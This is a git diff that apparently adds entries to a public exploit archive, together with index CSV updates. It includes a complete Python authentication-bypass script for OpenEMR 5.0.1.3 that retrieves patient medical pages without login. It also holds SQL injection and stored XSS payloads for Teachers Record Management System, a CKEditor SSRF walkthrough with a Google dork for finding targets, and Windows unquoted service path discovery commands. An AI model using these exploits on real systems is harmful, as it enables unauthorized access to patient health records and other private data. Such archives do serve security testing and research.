Configuration
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/50017.py b/exploits/php/webapps/50017.py
new file mode 100755
index 000000000..7c7a92456
--- /dev/null
+++ b/exploits/php/webapps/50017.py
@@ -0,0 +1,88 @@
+# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass
+# Date 15.06.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://www.open-emr.org/
+# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip
+# Version: All versions prior to 5.0.1.4
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2018-15152
+# CWE: CWE-287
+# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit
+
+'''
+Description:
+An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to
+the registration page and modifying the requested url to access the desired page. Some
+examples of pages in the portal directory that are accessible after browsing to the
+registration page include:
+- add_edit_event_user.php
+- find_appt_popup_user.php
+- get_allergies.php
+- get_amendments.php
+- get_lab_results.php
+- get_medications.php
+- get_patient_documents.php
+- get_problems.php
+- get_profile.php
+- portal_payment.php
+- messaging/messages.php
+- messaging/secure_chat.php
+- report/pat_ledger.php
+- report/portal_custom_report.php
+- report/portal_patient_report.php
+Normally, access to these pages requires authentication as a patient. If a user were to visit
+any of those pages unauthenticated, they would be redirected to the login page.
+'''
+
+
+'''
+Import required modules:
+'''
+import requests
+import argparse
+
+
+'''
+User-Input:
+'''
+my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--Openemrpath', type=str)
+my_parser.add_argument('-R', '--PathToGet', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+openemr_path = args.Openemrpath
+pathtoread = args.PathToGet
+
+
+'''
+Check for vulnerability:
+'''
+# Check, if Registration portal is enabled. If it is not, this exploit can not work
+session = requests.Session()
+check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'
+check_vuln = session.get(check_vuln_url).text
+print('')
+print('[*] Checking vulnerability: ')
+print('')
+
+if "Enter email address to receive registration." in check_vuln:
+ print('[+] Host Vulnerable. Proceeding exploit')
+else:
+ print('[-] Host is not Vulnerable: Registration for patients is not enabled')
+
+'''
+Exploit:
+'''
+header = {
+ 'Referer': check_vuln_url
+}
+exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread
+Exploit = session.get(exploit_url, headers=header)
+print('')
+print('[+] Results: ')
+print('')
+print(Exploit.text)
+print('')
\ No newline at end of file
diff --git a/exploits/php/webapps/50018.txt b/exploits/php/webapps/50018.txt
new file mode 100644
index 000000000..f35120bfa
--- /dev/null
+++ b/exploits/php/webapps/50018.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)
+# Date: 05-10-2021
+# Exploit Author: nhattruong
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10 + XAMPP v3.2.4
+
+POC:
+1. Go to url http://localhost/login.php
+2. Login with default creds
+3. Execute the payload
+
+Payload #1:
+
+POST /admin/search.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 32
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/trms/admin/search.php
+Cookie: PHPSESSID=4c4g8dedr7omt9kp1j7d6v6fg0
+Upgrade-Insecure-Requests: 1
+
+searchdata=a' or 1=1-- -&search=
+
+Payload #2:
+
+http://local/admin/edit-subjects-detail.php?editid=a' or 1=1-- -
+
+Payload #3:
+
+http://local/admin/edit-teacher-detail.php?editid=a' or 1=1-- -
\ No newline at end of file
diff --git a/exploits/php/webapps/50019.txt b/exploits/php/webapps/50019.txt
new file mode 100644
index 000000000..f72729726
--- /dev/null
+++ b/exploits/php/webapps/50019.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Teachers Record Management System 1.0 – 'email' Stored Cross-site Scripting (XSS)
+# Date: 05-10-2021
+# Exploit Author: nhattruong
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10 + XAMPP v3.2.4
+
+POC:
+1. Go to url http://localhost/admin/index.php
+2. Do login
+3. Execute the payload
+4. Reload page to see the different
+
+Payload:
+
+POST /admin/adminprofile.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 91
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/trms/admin/adminprofile.php
+Cookie: PHPSESSID=8vkht2tvbo774tsjke1t739i7l
+Upgrade-Insecure-Requests: 1
+
+adminname=Adminm&username=admin&mobilenumber=8979555556&email=">&submit=
\ No newline at end of file
diff --git a/exploits/php/webapps/50021.txt b/exploits/php/webapps/50021.txt
new file mode 100644
index 000000000..f9298c2fa
--- /dev/null
+++ b/exploits/php/webapps/50021.txt
@@ -0,0 +1,53 @@
+# Exploit Title: CKEditor 3 - Server-Side Request Forgery (SSRF)
+# Google Dorks : inurl /editor/filemanager/connectors/uploadtest.html
+# Date: 12-6-2021
+# Exploit Author: Blackangel
+# Software Link: https://ckeditor.com/
+# Version:all version under 4 (1,2,3)
+# Tested on: windows 7
+
+Steps of Exploit:-
+
+1-using google dorks
+
+inurl /editor/filemanager/connectors/uploadtest.html
+
+2-after going to vulnerable page you will find filed “Custom Uploader URL: ”
+
+3-right click then choose inspect element, click on pick an element from
+the page , select field Custom Uploader URL:
+
+4-in elements “”
+
+delete disabled=””
+
+5-now you can put url start with any protocal
+
+6-send it to the server as you see website that you have entered link
+
+is appear into page .
+
+what this mean??!!1
+
+you send request to server using vulnerable website
+
+you can said i used it as proxy
+
+hackers >>> vulnerable website >>> http:/xx.com
+
+so in http://xx.com logs requests come from vulnerable website
+
+impact:-
+
+1-that allows an attacker to induce the server-side application to make
+HTTP requests to an arbitrary domain of the attacker’s choosing. if there
+is big company use old version hackers can send request via there websites
+and this not good for reputation of company
+
+2-put big company website in blacklist of websites cause i hackers can send
+many of request via vulnerable website
+
+Mitigation:-
+
+Remove the uploadtest.html file as it is not used by the application.
\ No newline at end of file
diff --git a/exploits/windows/local/50012.txt b/exploits/windows/local/50012.txt
new file mode 100644
index 000000000..ab312e198
--- /dev/null
+++ b/exploits/windows/local/50012.txt
@@ -0,0 +1,50 @@
+# Exploit Title: DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 14-06-2021
+# Vendor Homepage: https://www.diskpulse.com
+# Software Links:
+# https://www.diskpulse.com/setups_x64/diskpulseent_setup_v13.6.14_x64.exe
+# https://www.diskpulse.com/setups_x64/diskpulsesrv_setup_v13.6.14_x64.exe
+# Tested Version: 13.6.14
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+Disk Pulse Enterprise Disk Pulse Enterprise C:\Program Files\Disk Pulse
+Enterprise\bin\diskpls.exe Auto
+Disk Pulse Server Disk Pulse Server C:\Program Files\Disk Pulse
+Server\bin\diskpls.exe Auto
+
+C:\Users\IEUser>sc qc "Disk Pulse Enterprise"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Disk Pulse Enterprise
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Pulse
+Enterprise\bin\diskpls.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Disk Pulse Enterprise
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+C:\Users\IEUser>sc qc "Disk Pulse Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Disk Pulse Server
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Pulse
+Server\bin\diskpls.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Disk Pulse Server
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/50013.txt b/exploits/windows/local/50013.txt
new file mode 100644
index 000000000..34921c8ed
--- /dev/null
+++ b/exploits/windows/local/50013.txt
@@ -0,0 +1,31 @@
+ # Exploit Title: Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path
+# Discovery by: BRushiran
+# Date: 15-06-2021
+# Vendor Homepage: https://www.disksorter.com
+# Software Links: https://www.disksorter.com/setups_x64/disksortersrv_setup_v13.6.12_x64.exe
+# Tested Version: 13.6.12
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+Disk Sorter Server Disk Sorter Server C:\Program Files\Disk Sorter
+Server\bin\disksrs.exe Auto
+
+C:\>sc qc "Disk Sorter Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Disk Sorter Server
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Sorter
+Server\bin\disksrs.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Disk Sorter Server
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 5574d20ec..11e0e5685 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11368,6 +11368,8 @@ id,file,description,date,author,type,platform,port
50009,exploits/windows/local/50009.txt,"SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows,
50010,exploits/windows/local/50010.txt,"Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows,
50011,exploits/linux/local/50011.sh,"Polkit 0.105-26 0.117-2 - Local Privilege Escalation",2021-06-15,"J Smith",local,linux,
+50012,exploits/windows/local/50012.txt,"DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path",2021-06-16,"Brian Rodriguez",local,windows,
+50013,exploits/windows/local/50013.txt,"Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path",2021-06-16,BRushiran,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44165,3 +44167,8 @@ id,file,description,date,author,type,platform,port
49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",2021-06-14,"Ron Jost",webapps,php,
50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",2021-06-15,"BHAVESH KAUL",webapps,php,
50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,
+50016,exploits/php/webapps/50016.txt,"Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting",2021-06-16,"Fatih İLGİN",webapps,php,
+50017,exploits/php/webapps/50017.py,"OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass",2021-06-16,"Ron Jost",webapps,php,
+50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-06-16,nhattruong,webapps,php,
+50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",2021-06-16,nhattruong,webapps,php,
+50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",2021-06-16,ahmed,webapps,php,
Done
+-
+
- Updated +